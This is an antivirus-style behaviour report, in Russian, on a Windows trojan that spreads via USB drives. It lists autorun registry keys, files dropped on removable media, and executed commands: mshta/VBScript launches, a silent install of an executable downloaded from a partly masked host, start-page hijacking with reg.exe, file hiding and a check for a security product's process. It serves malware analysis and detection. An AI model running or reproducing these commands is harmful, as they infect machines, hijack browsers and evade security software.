Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Classes\MSProgramGroup\Shell\Open\Command] '' = '<SYSTEM32>\grpconv.exe %1'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'GrpConv' = 'grpconv -o'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'fsahdsf' = '"<Имя диска съемного носителя>:\zations\tmp.\a.{D71C5380-D2A0-CD69-E3EE-E1002B3A309E}" hh.exe'
Создает следующие файлы на съемном носителе:
- <Имя диска съемного носителя>:\zations\╠╘▒ж═°-╠╘╬╥╧▓╗╢.url
- <Имя диска съемного носителя>:\zations\9477-╨б╙╬╧╖.url
- <Имя диска съемного носителя>:\zations\═°╓╖╡╝║╜┤є╚л.url
- <Имя диска съемного носителя>:\zations\╚э╝■╧┬╘╪.url
- <Имя диска съемного носителя>:\zations\2.inf
- <Имя диска съемного носителя>:\zations\3.bat
- <Имя диска съемного носителя>:\zations\1.inf
- <Имя диска съемного носителя>:\zations\look.bat
- <Имя диска съемного носителя>:\zations\2.bat
- <Имя диска съемного носителя>:\zations\1.bat
- <Имя диска съемного носителя>:\0036123000.exe
- <Имя диска съемного носителя>:\zations\4399-╨б╙╬╧╖.url
- <Имя диска съемного носителя>:\zations\4399╨б╙╬╧╖.url
- <Имя диска съемного носителя>:\zations\7K7K-╨б╙╬╧╖.url
Вредоносные функции:
Создает и запускает на исполнение:
- %TEMP%\nsf2.tmp\ns6.tmp cmd /c echo %time%>>"%PROGRAM_FILES%\36301200\bat.ini"
- %TEMP%\nsf2.tmp\ns7.tmp mshta vbscript:createobject("wscript.shell").run("""iexplore""http://cn##.sjt8.com/info.access/?st#####",0)(window.close)
- %PROGRAM_FILES%\36301200\caihong.exe (загружен из сети Интернет) /VERYSILENT /SP- /NORESTART
- %TEMP%\nsf2.tmp\ns3.tmp cmd /c echo @echo off>>"<Имя диска съемного носителя>:\zations\look.bat"
- %TEMP%\nsf2.tmp\ns4.tmp cmd /c echo start/min <Имя диска съемного носителя>:\zations\1.bat>>"<Имя диска съемного носителя>:\zations\look.bat"
- %TEMP%\nsf2.tmp\ns5.tmp cmd /c echo del %0>>"<Имя диска съемного носителя>:\zations\look.bat"
Запускает на исполнение:
- <SYSTEM32>\rundll32.exe syssetup,SetupInfObjectInstallAction DefaultInstall 128 <Имя диска съемного носителя>:\zations\2.inf
- <SYSTEM32>\tasklist.exe
- <SYSTEM32>\attrib.exe +s +h <Имя диска съемного носителя>:\zations\tmp
- <SYSTEM32>\reg.exe add "HKCR\CLSID\{D71C5380-D2A0-CD69-E3EE-E1002B3A309E}\Shell\open(&H)\Command" /v "" /d "wscript -e:vbs ""<Имя диска съемного носителя>:\zations\3.bat""" /f
- <SYSTEM32>\attrib.exe +s +h <Имя диска съемного носителя>:\zations\tmp\a.{D71C5380-D2A0-CD69-E3EE-E1002B3A309E}
- <SYSTEM32>\runonce.exe -r
- <SYSTEM32>\reg.exe add "HKLM\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.97##u.com/?99" /f
- <SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.97##u.com/?99" /f
- <SYSTEM32>\rundll32.exe syssetup,SetupInfObjectInstallAction DefaultInstall 128 <Имя диска съемного носителя>:\zations\sll.inf
- <SYSTEM32>\grpconv.exe -o
- <SYSTEM32>\find.exe /i "360tray.exe" tasklist.txt
- <SYSTEM32>\msiexec.exe /i "%PROGRAM_FILES%\36301200\0036.msi" /quiet
- <SYSTEM32>\msiexec.exe /V
- <SYSTEM32>\cmd.exe /c echo del %0>>"<Имя диска съемного носителя>:\zations\look.bat"
- <SYSTEM32>\cmd.exe /c echo @echo off>>"<Имя диска съемного носителя>:\zations\look.bat"
- <SYSTEM32>\cmd.exe /c echo start/min <Имя диска съемного носителя>:\zations\1.bat>>"<Имя диска съемного носителя>:\zations\look.bat"
- <SYSTEM32>\mshta.exe vbscript:createobject("wscript.shell").run("""iexplore""http://cn##.sjt8.com/info.access/?st#####",0)(window.close)
- <SYSTEM32>\rundll32.exe syssetup,SetupInfObjectInstallAction DefaultInstall 128 <Имя диска съемного носителя>:\zations\1.inf
- <SYSTEM32>\reg.exe add "HKCR\CLSID\{D71C5380-D2A0-CD69-E3EE-E1002B3A309E}" /v "IsShortCut" /d "" /f
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE Explorer\IEXPLORE.EXE http://www.nz##8.net/index2.html
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://cn##.sjt8.com/info.access/?st#####
- <SYSTEM32>\msiexec.exe -Embedding B63C4396246E24B199DE760EA456E9F8
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\Installer\MSI8.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4
- %WINDIR%\Installer\MSI9.tmp
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\info[1]
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4
- %WINDIR%\Installer\23b69.msi
- %TEMP%\nsf2.tmp\ns7.tmp
- %PROGRAM_FILES%\36301200\caihong.exe
- %TEMP%\nsf2.tmp\NSISdl.dll
- <SYSTEM32>\Internet Explorer.url
- <SYSTEM32>\find.txt
- %PROGRAM_FILES%\36301200\kugou_2355.exe
- <SYSTEM32>\sll.inf
- <SYSTEM32>\tasklist.txt
- C:\Config.Msi\23b6c.rbs
- %WINDIR%\Installer\MSIA.tmp
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\0D6B6PI5\index2[1].html
- %TEMP%\MSI26caa.LOG
- %PROGRAM_FILES%\36301200\bat.msi
- %PROGRAM_FILES%\36301200\abcd.exe
- %TEMP%\nsf2.tmp\ns6.tmp
- %PROGRAM_FILES%\36301200\360P2SP.wma
- %TEMP%\nsf2.tmp\ns5.tmp
- %TEMP%\nsf2.tmp\nsExec.dll
- %TEMP%\nsf2.tmp\System.dll
- %TEMP%\nsf2.tmp\ns4.tmp
- %TEMP%\nsf2.tmp\ns3.tmp
- %PROGRAM_FILES%\36301200\bat.ini
- %PROGRAM_FILES%\date3600\date3600.ini
- %PROGRAM_FILES%\date3600\date3600.exe
- %APPDATA%\Microsoft\Internet Explorer\Quick Launch\КАЅзЦ®ґ° дЇААЖч.lnk
- %HOMEPATH%\Desktop\КАЅзЦ®ґ° дЇААЖч.lnk
- %PROGRAM_FILES%\date3600\dailytips.ini
- %PROGRAM_FILES%\date3600\IeUpdate.exe
- %PROGRAM_FILES%\36301200\0036.msi
- %PROGRAM_FILES%\date3600\oem.ini
- %PROGRAM_FILES%\date3600\IeUpdate.ini
Присваивает атрибут 'скрытый' для следующих файлов:
- %PROGRAM_FILES%\date3600\date3600.ini
- %PROGRAM_FILES%\date3600\oem.ini
Удаляет следующие файлы:
- %WINDIR%\Installer\23b6b.ipi
- C:\Config.Msi\23b6c.rbs
- %WINDIR%\Installer\MSIA.tmp
- <SYSTEM32>\find.txt
- <SYSTEM32>\tasklist.txt
- %WINDIR%\Installer\23b69.msi
- %WINDIR%\Installer\MSI9.tmp
- %TEMP%\nsf2.tmp\ns5.tmp
- %TEMP%\nsf2.tmp\ns4.tmp
- %TEMP%\nsf2.tmp\ns3.tmp
- %WINDIR%\Installer\MSI8.tmp
- %TEMP%\nsf2.tmp\ns7.tmp
- %TEMP%\nsf2.tmp\ns6.tmp
Сетевая активность:
Подключается к:
- 'localhost':1041
- 'cn##.sjt8.com':80
- 'xi####.kugou.com':80
- 'www.nz##8.net':80
- 'se###.ov-v.com':80
- 'crl.verisign.com':80
- 'localhost':1039
- 'cs#######-2-crl.verisign.com':80
TCP:
Запросы HTTP GET:
- cn##.sjt8.com/info.access/?st#####
- www.nz##8.net/index2.html
- xi####.kugou.com/Corp/kugou_2355.exe
- crl.verisign.com/pca3.crl
- se###.ov-v.com/install/caihong.exe
- cs#######-2-crl.verisign.com/CSC3-2009-2.crl
UDP:
- DNS ASK cn##.sjt8.com
- DNS ASK www.nz##8.net
- DNS ASK xi####.kugou.com
- DNS ASK cs#######-2-crl.verisign.com
- DNS ASK crl.verisign.com
- DNS ASK se###.ov-v.com
- '<IP-адрес в локальной сети>':1036
- '<IP-адрес в локальной сети>':1034
Другое:
Ищет следующие окна:
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
